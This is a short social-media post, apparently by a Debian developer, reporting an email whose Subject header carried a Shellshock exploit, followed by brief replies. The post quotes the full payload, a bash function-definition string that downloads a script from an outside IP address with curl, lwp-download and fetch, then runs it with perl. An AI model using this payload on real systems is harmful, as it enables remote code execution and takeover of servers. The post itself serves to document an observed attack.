joeyh at
Received email message that attempted to exploit shellshock bug. Manually joined the attacker's CNC irc channel, and it seems at least 2 mail servers were actually successfully exploited this way.
Subject: () { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download 178.254.31.165/ex.txt;fetch
178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Jakukyo Friel likes this.
Stefano Zacchiroli shared this.
Any idea which MTA(s)?
Pretty sure not postfix! ;)
I weep for the futur... erm, present.